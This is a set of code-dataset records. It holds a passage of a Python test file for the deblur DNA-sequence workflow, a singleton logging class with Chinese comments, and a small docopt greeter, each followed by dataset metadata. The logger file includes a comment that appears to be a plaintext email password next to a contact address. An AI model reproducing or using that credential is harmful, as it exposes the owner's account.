"TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCC"), ("seq2", "CCTAAAACGTCCGTAGTCGGCTTTGTAAATCCCTGGGTAAATCGGGT"), ("seq3", "TCGCTATTATTGAGCCTAAAACGTCCGTAGTCGGCTTTGTAAATCCC"), ("seq4", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCC"), ("seq5", "CTAAAACGTCCGTAGTCGGCTTTGTAAATCCCTGGGTAAATAGGGTC"), ("seq6", "TTGAGCCTAAAACGTCCGTAGTCGGCTTTGTAAATCCCTGGGTAAAT"), ("phix1", "TCTAAAGGTAAAAAACGTTCTGGCGCTCGCCCTGGTCGTCCGCAGCC"), ("phix2", "CTGGCGCTCGCCCTGGTCGTCCGCAGCCGTTGCGAGGTACTAAAGGC"), ("phix3", "GCGCATAAATTTGAGCAGATTTGTCGTCACAGGTTGCGCCGCCAAAA")] exp_seqs = ["seq1", "seq2", "seq3", "seq4", "seq5", "seq6"] seqs_fp = join(self.working_dir, "seqs.fasta") with open(seqs_fp, 'w') as seqs_f: for seq in seqs: seqs_f.write(">%s\n%s\n" % seq) ref = [("ref1", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCCGTA" "GTCGGCTTTGTAAATCCCTGGGTAAATCGGGT"), ("ref2", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCCGTAG" "TCGGCTTTGTAAATCCCTGGGTAAATCGGGT"), ("ref3", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCCGTAG" "TCGGCTTTGTAAATCCCTGGGTAAATCGGGT"), ("ref4", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCCGTAG" "TCGGCTTTGTAAATCCCTGGGTAAATCGGGT"), ("ref5", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCCGTAG" "TCGGCTTTGTAAATCCCTGGGTAAATAGGGT"), ("ref6", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCCGTAG" "TCGGCTTTGTAAATCCCTGGGTAAATCGGGT")] ref_fp = join(self.working_dir, "ref3.fasta") with open(ref_fp, 'w') as ref_f: for seq in ref: ref_f.write(">%s\n%s\n" % seq) self.files_to_remove.append(ref_fp) # build index sortmerna_db = build_index_sortmerna([ref_fp], self.working_dir) output_fp = join(self.working_dir, "seqs_filtered.fasta") output_fp = remove_artifacts_seqs(seqs_fp=seqs_fp, ref_fp=(ref_fp,), working_dir=self.working_dir, ref_db_fp=sortmerna_db, negate=False, threads=1) obs_seqs = [] with open(output_fp, 'U') as output_f: for label, seq in parse_fasta(output_f): obs_seqs.append(label) self.assertEqual(obs_seqs, exp_seqs) def test_remove_artifacts_seqs_negate(self): """ Test remove_artifacts_seqs() function for removing sequences matching to a reference database using SortMeRNA (negate option). """ seqs = [("seq1", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCC"), ("seq2", "CCTAAAACGTCCGTAGTCGGCTTTGTAAATCCCTGGGTAAATCGGGT"), ("seq3", "TCGCTATTATTGAGCCTAAAACGTCCGTAGTCGGCTTTGTAAATCCC"), ("seq4", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCC"), ("seq5", "CTAAAACGTCCGTAGTCGGCTTTGTAAATCCCTGGGTAAATAGGGTC"), ("seq6", "TTGAGCCTAAAACGTCCGTAGTCGGCTTTGTAAATCCCTGGGTAAAT"), ("phix1", "TCTAAAGGTAAAAAACGTTCTGGCGCTCGCCCTGGTCGTCCGCAGCC"), ("phix2", "CTGGCGCTCGCCCTGGTCGTCCGCAGCCGTTGCGAGGTACTAAAGGC"), ("phix3", "GCGCATAAATTTGAGCAGATTTGTCGTCACAGGTTGCGCCGCCAAAA")] # seq5 is 80% similar, so should be kept for 0.95 default similarity # to artifacts exp_seqs = ["seq5", "phix1", "phix2", "phix3"] seqs_fp = join(self.working_dir, "seqs.fasta") with open(seqs_fp, 'w') as seqs_f: for seq in seqs: seqs_f.write(">%s\n%s\n" % seq) ref = [("ref1", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCCGTA" "GTCGGCTTTGTAAATCCCTGGGTAAATCGGGT"), ("ref2", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCCGTAG" "TCGGCTTTGTAAATCCCTGGGTAAATCGGGT"), ("ref3", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCCGTAG" "TCGGCTTTGTAAATCCCTGGGTAAATCGGGT"), ("ref4", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCCGTAG" "TCGGCTTTGTAAATCCCTGGGTAAATCGGGT"), ("ref5", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCCGTAG" "TCGGCTTTGTAAATCCCTGGGTAAATAGGGT"), ("ref6", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCCGTAG" "TCGGCTTTGTAAATCCCTGGGTAAATCGGGT")] ref_fp = join(self.working_dir, "ref4.fasta") with open(ref_fp, 'w') as ref_f: for seq in ref: ref_f.write(">%s\n%s\n" % seq) self.files_to_remove.append(ref_fp) ref_db_fp = build_index_sortmerna([ref_fp], self.working_dir) output_fp = join(self.working_dir, "seqs_filtered.fasta") output_fp = remove_artifacts_seqs(seqs_fp=seqs_fp, ref_fp=(ref_fp,), working_dir=self.working_dir, ref_db_fp=ref_db_fp, negate=True, threads=1) obs_seqs = [] with open(output_fp, 'U') as output_f: for label, seq in parse_fasta(output_f): obs_seqs.append(label) self.assertEqual(obs_seqs, exp_seqs) def test_remove_chimeras_denovo_from_seqs(self): """ Test remove_chimeras_denovo_from_seqs() method functionality. Remove chimeric sequences from a FASTA file using the UCHIME algorithm, implemented in VSEARCH. """ seqs = [("s1_104;size=2;", "GTGCCAGCCGCCGCGGTAATACCCGCAGCTCAAGTGGTG" "GTCGCTATTATTGAGCCTAAAACGTCCGTAGTCGGCTTT" "GTAAATCCCTGGGTAAATCGGGAAGCTTAACTTTCCGAC" "TTCCGAGGAGACTGTCAAACTTGGGACCGGGAG"), ("s1_106;size=2;", "GTGTCAGCCGCCGCGGTAATACCAGCTCTCCGAGTGGTG" "TGGATGTTTATTGGGCCTAAAGCGTCCGTAGCCGGCTGC" "GCAAGTCTGTCGGGAAATCCGCACGCCTAACGTGCGGGC" "GTCCGGCGGAAACTGCGTGGCTTGGGACCGGAA"), ("s1_1;size=9;", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAA" "ACGTCCGTAGTCGGCTTTGTAAATCCCTGGGTAAATCGGGT" "CGCTTAACGATCCGATTCTGGGGAGACTGCAAAGCTTGGGA" "CCGGGCGAGGTTAGAGGTACTCTCGGG"), ("s1_20;size=9;", "TACCTGCAGCCCAAGTGGTGGTCGATTTTATTGAGTCTAA" "AACGTTCGTAGCCGGTTTGATAAATCCTTGGGTAAATCGG" "GAAGCTTAACTTTCCGATTCCGAGGAGACTGTCAAACTTG" "GGACCGGGAGAGGCTAGAGGTACTTCTGGG"), ("s1_40;size=8;", "TACCAGCTCTCCGAGTGGTGTGGATGTTTATTGGGCCTAA" "AGCATCCGTAGCTGGCTAGGTTAGTCCCCTGTTAAATCCA" "CCGAATTAATCGTTGGATGCGGGGGATACTGCTTGGCTAG" "GGGACGAGAGAGGCAGACGGTATTTCCGGG"), ("s1_60;size=8;", "TACCGGCAGCTCAAGTGATGACCGCTATTATTGGGCCTAA" "AGCGTCCGTAGCCGGCTGCGCAAGTCTGTCGGGAAATCCG" "CACGCCTAACGTGCGGGTCCGGCGGAAACTGCGTGGCTTG" "GGACCGGAAGACTCGAGGGGTACGTCAGGG")] seqs_non_chimera = ["s1_1;size=9;", "s1_20;size=9;", "s1_40;size=8;", "s1_60;size=8;"] seqs_fp = join(self.working_dir, "seqs.fasta") with open(seqs_fp, 'w') as seqs_f: for seq in seqs: seqs_f.write(">%s\n%s\n" % seq) output_fp = remove_chimeras_denovo_from_seqs( seqs_fp=seqs_fp, working_dir=self.working_dir) seqs_obs = [] with open(output_fp, 'U') as output_f: for label, seq in parse_fasta(output_f): label = label.split()[0] seqs_obs.append(label) self.assertEqual(seqs_non_chimera, seqs_obs) def test_multiple_sequence_alignment(self): """Test multiple sequence alignment. """ seqs = [DNA('caccggcggcccggtggtggccattattattgggtctaaag', id='seq_1'), DNA('caccggcggcccgagtggtggccattattattgggtcaagg', id='seq_2'), DNA('caccggcggcccgagtgatggccattattattgggtctaaag', id='seq_3'), DNA('aaccggcggcccaagtggtggccattattattgggtctaaag', id='seq_4'), DNA('caccgggcccgagtggtggccattattattgggtctaaag', id='seq_5')] seqs_col = SequenceCollection(seqs) seqs_fp = join(self.working_dir, "seqs.fna") with open(seqs_fp, 'w') as o: o.write(seqs_col.to_fasta()) alignment_file = multiple_sequence_alignment(seqs_fp) with open(alignment_file, 'U') as f: aligned_seqs = [DNA(item[1], id=item[0]) for item in parse_fasta(f)] align_exp = [ DNA( 'caccggcggcccg-gtggtggccattattattgggtctaaag', id='seq_1'), DNA( 'caccggcggcccgagtggtggccattattattgggtcaagg-', id='seq_2'), DNA( 'caccggcggcccgagtgatggccattattattgggtctaaag', id='seq_3'), DNA( 'aaccggcggcccaagtggtggccattattattgggtctaaag', id='seq_4'), DNA( 'caccg--ggcccgagtggtggccattattattgggtctaaag', id='seq_5')] self.assertItemsEqual(aligned_seqs, align_exp) def test_build_index_sortmerna(self): """Test functionality of build_index_sortmerna() """ ref1 = [("ref1", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCCGTA" "GTCGGCTTTGTAAATCCCTGGGTAAATCGGGT"), ("ref2", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCCGTAG" "TCGGCTTTGTAAATCCCTGGGTAAATCGGGT"), ("ref3", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCCGTAG" "TCGGCTTTGTAAATCCCTGGGTAAATCGGGT"), ("ref4", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCCGTAG" "TCGGCTTTGTAAATCCCTGGGTAAATCGGGT"), ("ref5", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCCGTAG" "TCGGCTTTGTAAATCCCTGGGTAAATAGGGT"), ("ref6", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCCGTAG" "TCGGCTTTGTAAATCCCTGGGTAAATCGGGT")] ref2 = [("ref1", "GTCGTAGCTAGCTGCCCACGATCGTAGCTAGCTAGCTACGTAGCTCATCAC" "TCGCCGACCCACGTCCCACTGATGCTGTGGG"), ("ref2", "GCGGCGCCCAAAAATGTCGTGTAAAATTTTCTCGTACCCACTTGCTACCCA" "TGGCCGCCATGCTGCTAACGCAATATATATA"), ("ref3", "TGTGAAAGCGCGCGAGAGAGTCGTATATATGGGCGCGGCGCGATGCTGCCC" "GTCGATGCTGATCCCCCACGTACGTAGCCCC"), ("ref4", "GTGTGCTCGCGTAGCTAGCTTATATATCGGCGCGTAGTGCTAGCCCCAAAA" "GTGTCCCCCCCCTCCTTTTTTATATATGCAA"), ("ref5", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCCGTAG" "TCGGCTTTGTAAATCCCTGGGTAAATAGGGT"), ("ref6", "TACCCGCAGCTCAAGTGGTGGTCGCTATTATTGAGCCTAAAACGTCCGTAG" "TCGGCTTTGTAAATCCCTGGGTAAATCGGGT")] ref1_fp = join(self.working_dir, "ref1.fasta") with open(ref1_fp, 'w') as ref_f: for seq in ref1: ref_f.write(">%s\n%s\n" % seq) ref2_fp = join(self.working_dir, "ref2.fasta") with open(ref2_fp, 'w') as ref_f: for seq in ref2: ref_f.write(">%s\n%s\n" % seq) ref_fps = tuple([ref1_fp, ref2_fp]) ref_db_fp = build_index_sortmerna( ref_fp=ref_fps, working_dir=self.working_dir) self.assertEqual(len(ref_fps), len(ref_db_fp)) def run_workflow_try(self, simfilename, origfilename, ref_fp, ref_db_fp): """Test launching the complete workflow using simulated sequences and compare to original ground truth. Parameters ---------- simfilename : str name of the simulated reads fasta file origfilename : str name of the fasta file with the ground truth sequences """ seqs_fp = simfilename output_fp = self.working_dir read_error = 0.05 mean_error = 0.005 error_dist = None indel_prob = 0.01 indel_max = 3 trim_length = 100 min_size = 2 negate = False threads = 1 delim = '_' nochimera = launch_workflow(seqs_fp, output_fp, read_error, mean_error, error_dist, indel_prob, indel_max, trim_length, min_size, (ref_fp,), ref_db_fp, negate, threads, delim) # get the trimmed ground truth sequences with open(origfilename, 'U') as f: orig_seqs = [item[1] for item in parse_fasta(f)] orig_seqs = [item[:trim_length].upper() for item in orig_seqs] output_filename = 'final.biom' output_table_fp = join(output_fp, output_filename) create_otu_table(output_table_fp, [(nochimera, seqs_fp)]) table_obs = load_table(output_table_fp) outseqs = table_obs.ids(axis='observation') outseqs = list(outseqs) outseqs.sort() orig_seqs.sort() # test we see all ground truth sequences and no other self.assertItemsEqual(outseqs, orig_seqs) def test_get_files_for_table(self): filelist = get_files_for_table(self.test_data_dir) file1 = join(self.test_data_dir, 'testmerge.fasta.trim.derep.no_artifacts' '.msa.deblur.no_chimeras') file2 = join(self.test_data_dir, 'testmerge2.fasta.trim.derep.no_artifacts' '.msa.deblur.no_chimeras') self.assertEqual(len(filelist), 2) self.assertTrue(file1 in [filelist[0][0], filelist[1][0]]) self.assertTrue(file2 in [filelist[0][0], filelist[1][0]]) self.assertTrue('testmerge' in [filelist[0][1], filelist[1][1]]) def test_create_otu_table(self): # merge the fasta files m1 = join(self.test_data_dir, 'testmerge.fasta.trim.derep.no_artifacts' '.msa.deblur.no_chimeras') m2 = join(self.test_data_dir, 'testmerge2.fasta.trim.derep.no_artifacts' '.msa.deblur.no_chimeras') outfile = join(self.working_dir, 'testmerge.biom') create_otu_table(outfile, [(m1, 'testmerge'), (m2, 'testmerge2')]) # test the result table = load_table(outfile) # test a sequence present in both self.assertEqual(table.get_value_by_ids( 'TACGAGGggggCGAGCGTTGTTCGGAATTATTGGGCGTAAAAGGTGCGTAGGCGGTTCG' 'GTAAGTTTCGTGTGAAATCTTCGGGCTCAACTCGAAGCCTGCACGAAATACTGCCGGGC' 'TTGAGTGTGGGAGAGGTGAGTGGAATTTCCGGT', 'testmerge'), 5) self.assertEqual(table.get_value_by_ids( 'TACGAGGggggCGAGCGTTGTTCG' 'GAATTATTGGGCGTAAAAGGTGCGTAGGCGGTTCGGTAAGTTTCGTGTGAAATCTTCGGG' 'CTCAACTCGAAGCCTGCACGAAATACTGCCGGGCTTGAGTGTGGGAGAGGTGAGTGGAAT' 'TTCCGGT', 'testmerge2'), 8) # and an otu present only in one self.assertEqual(table.get_value_by_ids( 'TACGTAGGTGGCAAGCGTTATCCGGAATTATTGGGCGTAAAGCGAGCGTAGGCGGTTTCTT' 'AAGTCTGATGTGAAAGCCCACGGCTCAACCGTGGAGGGTCATTGGAAACTGGGGAACTTGA' 'GTGCAGAAGAGGAGAGTGGAATTCCATGT', 'testmerge'), 7) self.assertEqual(table.get_value_by_ids( 'TACGTAGGTGGCAAGCGTTATCCGGAATTATTGGGCGTAAAGCGAGCGTAGGCGGTTTCTTA' 'AGTCTGATGTGAAAGCCCACGGCTCAACCGTGGAGGGTCATTGGAAACTGGGGAACTTGAGT' 'GCAGAAGAGGAGAGTGGAATTCCATGT', 'testmerge2'), 0) def test_launch_workflow(self): """Test launching complete workflow using 3 simulated sequence files. seqs1 - 100 reads using art, original sequences are >0.5 identical. seqs2 - 200 reads using grinder, original sequences are >0.9 identical, 0.1 chimeras, 35 phix reads seqs3 - simple - 15 reads from seqs1 (10 reads for 1001203, 5 reads for 694276) for manual test validation """ # index the 70% rep. set database ref_fp = join(self.test_data_dir, '70_otus.fasta') ref_db_fp = build_index_sortmerna( ref_fp=(ref_fp,), working_dir=self.working_dir) self.run_workflow_try(self.seqs_s1_fp, self.orig_s1_fp, ref_fp, ref_db_fp) self.run_workflow_try(self.seqs_s2_fp, self.orig_s2_fp, ref_fp, ref_db_fp) self.run_workflow_try(self.seqs_s3_fp, self.orig_s3_fp, ref_fp, ref_db_fp) def get_seqs_act_split_sequence_on_sample_ids(self, output_dir): """Parse output of split_sequence_file_on_sample_ids_to_files() Parameters ---------- output_dir: string output directory path storing FASTA files Returns ------- seqs_act: dict dictionary with keys being sample IDs and values list of sequences belonging to sample ID """ seqs_act = {} for fn in listdir(output_dir): input_fp = join(output_dir, fn) sample_file = splitext(fn)[0] with open(input_fp, 'U') as input_f: for label, seq in parse_fasta(input_f): sample = label.split('_')[0] self.assertEqual(sample_file, sample) if sample not in seqs_act: seqs_act[sample] = [(label, seq)] else: seqs_act[sample].append((label, seq)) return seqs_act def test_split_sequence_file_on_sample_ids_to_files(self): """Test functionality of split_sequence_file_on_sample_ids_to_files() """ seqs_fasta = {"s1": [ ("s1_seq1", "TACCGGCAGCTCAAGTGATGACCGCTATTATTGGGCCTAAAGCGTCCG"), ("s1_seq2", "TACCGGCAGCTCAAGTGATGACCGCTATTATTGGGCCTAAAGCGTCCG")], "s2": [ ("s2_seq3", "TACCGGCAGCTCAAGTGATGACCGCTATTATTGGGCCTAAAGCGTCCG"), ("s2_seq4", "TACCGGCAGCTCAAGTGATGACCGCTATTATTGGGCCTAAAGCGTCCT")], "s3": [ ("s3_seq5", "TACCAGCCCCTTAAGTGGTAGGGACGATTATTTGGCCTAAAGCGTCCG"), ("s3_seq6", "CTGCAAGGCTAGGGGGCGGGAGAGGCGGGTGGTACTTGAGGGGAGAAT")], "s4": [ ("s4_seq7", "CTGCAAGGCTAGGGGGCGGGAGAGGCGGGTGGTACTTGAGGGGAGAAT")]} # Test FASTA file split on sample IDs to multiple FASTA files seqs_fp = join(self.working_dir, "seqs.fasta") with open(seqs_fp, 'w') as seqs_f: for sample in seqs_fasta: for seq in seqs_fasta[sample]: seqs_f.write(">%s\n%s\n" % seq) output_dir = mkdtemp() with open(seqs_fp, 'U') as seqs_f: split_sequence_file_on_sample_ids_to_files(seqs=seqs_f, outdir=output_dir) seqs_act = self.get_seqs_act_split_sequence_on_sample_ids( output_dir=output_dir) self.assertDictEqual(seqs_fasta, seqs_act) if __name__ == '__main__': main()
null
deblur/test/test_workflow.py
test_workflow.py
py
29,830
python
en
code
null
code-starcoder2
83
[ { "api_name": "unittest.TestCase", "line_number": 37, "usage_type": "name" }, { "api_name": "tempfile.mkdtemp", "line_number": 51, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 54, "usage_type": "call" }, { "api_name": "os.path.dirname", "line_number": 54, "usage_type": "call" }, { "api_name": "os.path.abspath", "line_number": 54, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 55, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 56, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 57, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 58, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 59, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 60, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 64, "usage_type": "call" }, { "api_name": "deblur.workflow.start_log", "line_number": 65, "usage_type": "call" }, { "api_name": "logging.DEBUG", "line_number": 65, "usage_type": "attribute" }, { "api_name": "skbio.util.remove_files", "line_number": 68, "usage_type": "call" }, { "api_name": "shutil.rmtree", "line_number": 69, "usage_type": "call" }, { "api_name": "deblur.workflow.trim_seqs", "line_number": 79, "usage_type": "call" }, { "api_name": "types.GeneratorType", "line_number": 81, "usage_type": "argument" }, { "api_name": "os.path.join", "line_number": 102, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 107, "usage_type": "call" }, { "api_name": "deblur.workflow.dereplicate_seqs", "line_number": 109, "usage_type": "call" }, { "api_name": "os.path.isfile", "line_number": 111, "usage_type": "call" }, { "api_name": "skbio.parse.sequences.parse_fasta", "line_number": 119, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 134, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 139, "usage_type": "call" }, { "api_name": "deblur.workflow.dereplicate_seqs", "line_number": 141, "usage_type": "call" }, { "api_name": "os.path.isfile", "line_number": 144, "usage_type": "call" }, { "api_name": "skbio.parse.sequences.parse_fasta", "line_number": 156, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 176, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 192, "usage_type": "call" }, { "api_name": "deblur.workflow.build_index_sortmerna", "line_number": 197, "usage_type": "call" }, { "api_name": "deblur.workflow.remove_artifacts_seqs", "line_number": 200, "usage_type": "call" }, { "api_name": "skbio.parse.sequences.parse_fasta", "line_number": 208, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 227, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 243, "usage_type": "call" }, { "api_name": "deblur.workflow.build_index_sortmerna", "line_number": 249, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 250, "usage_type": "call" }, { "api_name": "deblur.workflow.remove_artifacts_seqs", "line_number": 251, "usage_type": "call" }, { "api_name": "skbio.parse.sequences.parse_fasta", "line_number": 260, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 281, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 297, "usage_type": "call" }, { "api_name": "deblur.workflow.build_index_sortmerna", "line_number": 302, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 303, "usage_type": "call" }, { "api_name": "deblur.workflow.remove_artifacts_seqs", "line_number": 304, "usage_type": "call" }, { "api_name": "skbio.parse.sequences.parse_fasta", "line_number": 312, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 347, "usage_type": "call" }, { "api_name": "deblur.workflow.remove_chimeras_denovo_from_seqs", "line_number": 351, "usage_type": "call" }, { "api_name": "skbio.parse.sequences.parse_fasta", "line_number": 356, "usage_type": "call" }, { "api_name": "skbio.DNA", "line_number": 364, "usage_type": "call" }, { "api_name": "skbio.DNA", "line_number": 365, "usage_type": "call" }, { "api_name": "skbio.DNA", "line_number": 366, "usage_type": "call" }, { "api_name": "skbio.DNA", "line_number": 367, "usage_type": "call" }, { "api_name": "skbio.DNA", "line_number": 368, "usage_type": "call" }, { "api_name": "skbio.alignment.SequenceCollection", "line_number": 369, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 370, "usage_type": "call" }, { "api_name": "deblur.workflow.multiple_sequence_alignment", "line_number": 373, "usage_type": "call" }, { "api_name": "skbio.DNA", "line_number": 375, "usage_type": "call" }, { "api_name": "skbio.parse.sequences.parse_fasta", "line_number": 376, "usage_type": "call" }, { "api_name": "skbio.DNA", "line_number": 379, "usage_type": "call" }, { "api_name": "skbio.DNA", "line_number": 381, "usage_type": "call" }, { "api_name": "skbio.DNA", "line_number": 383, "usage_type": "call" }, { "api_name": "skbio.DNA", "line_number": 385, "usage_type": "call" }, { "api_name": "skbio.DNA", "line_number": 387, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 418, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 422, "usage_type": "call" }, { "api_name": "deblur.workflow.build_index_sortmerna", "line_number": 427, "usage_type": "call" }, { "api_name": "deblur.workflow.launch_workflow", "line_number": 455, "usage_type": "call" }, { "api_name": "skbio.parse.sequences.parse_fasta", "line_number": 462, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 466, "usage_type": "call" }, { "api_name": "deblur.workflow.create_otu_table", "line_number": 468, "usage_type": "call" }, { "api_name": "biom.load_table", "line_number": 470, "usage_type": "call" }, { "api_name": "deblur.workflow.get_files_for_table", "line_number": 480, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 481, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 484, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 494, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 497, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 500, "usage_type": "call" }, { "api_name": "deblur.workflow.create_otu_table", "line_number": 501, "usage_type": "call" }, { "api_name": "biom.load_table", "line_number": 504, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 535, "usage_type": "call" }, { "api_name": "deblur.workflow.build_index_sortmerna", "line_number": 536, "usage_type": "call" }, { "api_name": "os.listdir", "line_number": 562, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 563, "usage_type": "call" }, { "api_name": "os.path.splitext", "line_number": 564, "usage_type": "call" }, { "api_name": "skbio.parse.sequences.parse_fasta", "line_number": 566, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 597, "usage_type": "call" }, { "api_name": "tempfile.mkdtemp", "line_number": 602, "usage_type": "call" }, { "api_name": "deblur.workflow.split_sequence_file_on_sample_ids_to_files", "line_number": 604, "usage_type": "call" }, { "api_name": "unittest.main", "line_number": 612, "usage_type": "call" } ]
379273250
#!/usr/bin/env python # encoding: utf-8 ''' @author: toby @license: (C) Copyright 2013-2017, Node Supply Chain Manager Corporation Limited. @contact: [email protected] @software: pycharm @file: logger.py @time: 2020-11-18 23:20 @desc: ''' # MNJUFOYUIBJAKWFG 邮箱pass import os import time import threading log_dir = '../logs' import logging class Log(object): _instance_lock = threading.Lock() def __new__(cls, *args, **kwargs): if not hasattr(Log, "_instance"): with Log._instance_lock: if not hasattr(Log, "_instance"): Log._instance = object.__new__(cls) return Log._instance def __init__(self,filename=None): import os folder_or_dir = log_dir print('log_dir:'+log_dir) if not os.path.exists(folder_or_dir): print("folder or dir not exist !!!!!!") os.makedirs(folder_or_dir) # 创建目录或文件夹 else: print('folder exist!') # 文件命名 os.path.join(): 将多个路径组合后返回 self.logname = os.path.join(log_dir, '%s.log' % time.strftime('%Y-%m-%d')) # 生成记录器对象 self.logger = logging.getLogger() # 设置日志级别 self.logger.setLevel(logging.DEBUG) if filename==None: # 日志输出格式 fm = '[%(asctime)s] | %(filename)s |%(levelname)-6s: %(message)s' # fm = '%(levelname):%(levelno)s:%(name)s:%(funcName)s:%(asctime):%(pathname):%(filename):%(module):%(thread):%(threadName)' self.formatter = logging.Formatter(fm) else: fm ='[%(asctime)s] | %('+filename+')s |%(levelname)-6s: %(message)s' self.formatter = logging.Formatter(fm) def __console(self, level, message): # 创建一个FileHandler,用于写到本地日志文件 fh = logging.FileHandler(self.logname, encoding='utf-8') fh.setLevel(logging.DEBUG) fh.setFormatter(self.formatter) self.logger.addHandler(fh) # 创建一个StreamHandler,用于输出到控制台 sh = logging.StreamHandler() sh.setLevel(logging.DEBUG) sh.setFormatter(self.formatter) self.logger.addHandler(sh) # 判断日志级别 if level == 'info': self.logger.info(message) elif level == 'debug': self.logger.debug(message) elif level == 'warning': self.logger.warning(message) elif level == 'error': self.logger.error(message) # removeHandler在记录日志之后移除句柄,避免日志输出重复问题 self.logger.removeHandler(sh) self.logger.removeHandler(fh) # 关闭打开的文件 fh.close() # debug < info< warning< error< critical # debug模式 def debug(self, message): self.__console('debug', message) # info模式 def info(self, message): self.__console('info', message) # warning模式 def warning(self, message): self.__console('warning', message) # error模式 def error(self, message): self.__console('error', message) """ filename: 指定日志文件名 filemode: 和file函数意义相同,指定日志文件的打开模式,’w’或’a’ format: 指定输出的格式和内容,format可以输出很多有用信息。显示的条目可以是以下内容: %(levelname):日志级别的名字格式 %(levelno)s:日志级别的数字表示 %(name)s:日志名字 %(funcName)s:函数名字 %(asctime):日志时间,可以使用datefmt去定义时间格式,如上图。 %(pathname):脚本的绝对路径 %(filename):脚本的名字 %(module):模块的名字 %(thread):thread id %(threadName):线程的名字 """ if __name__ == '__main__': mylog = Log() mylog.info("main logging") print(log_dir)
null
flask-celery-hjw/log_pkg/mylogger.py
mylogger.py
py
4,010
python
en
code
null
code-starcoder2
83
[ { "api_name": "threading.Lock", "line_number": 23, "usage_type": "call" }, { "api_name": "os.path.exists", "line_number": 38, "usage_type": "call" }, { "api_name": "os.path", "line_number": 38, "usage_type": "attribute" }, { "api_name": "os.makedirs", "line_number": 41, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 47, "usage_type": "call" }, { "api_name": "os.path", "line_number": 47, "usage_type": "attribute" }, { "api_name": "time.strftime", "line_number": 47, "usage_type": "call" }, { "api_name": "logging.getLogger", "line_number": 49, "usage_type": "call" }, { "api_name": "logging.DEBUG", "line_number": 51, "usage_type": "attribute" }, { "api_name": "logging.Formatter", "line_number": 56, "usage_type": "call" }, { "api_name": "logging.Formatter", "line_number": 59, "usage_type": "call" }, { "api_name": "logging.FileHandler", "line_number": 65, "usage_type": "call" }, { "api_name": "logging.DEBUG", "line_number": 66, "usage_type": "attribute" }, { "api_name": "logging.StreamHandler", "line_number": 71, "usage_type": "call" }, { "api_name": "logging.DEBUG", "line_number": 72, "usage_type": "attribute" } ]
590642987
"""Greeter. Usage: basic.py hello <name> basic.py goodbye <name> basic.py (-h | --help) Options: -h --help Show this screen. """ from docopt import docopt def hello(name): print('Hello, {0}'.format(name)) def goodbye(name): print('Goodbye, {0}'.format(name)) if __name__ == '__main__': arguments = docopt(__doc__) # if an argument called hello was passed, execute the hello logic. if arguments['hello']: hello(arguments['<name>']) elif arguments['goodbye']: goodbye(arguments['<name>'])
null
019_CLI/docopt_test.py
docopt_test.py
py
547
python
en
code
null
code-starcoder2
83
[ { "api_name": "docopt.docopt", "line_number": 23, "usage_type": "call" } ]
44840318
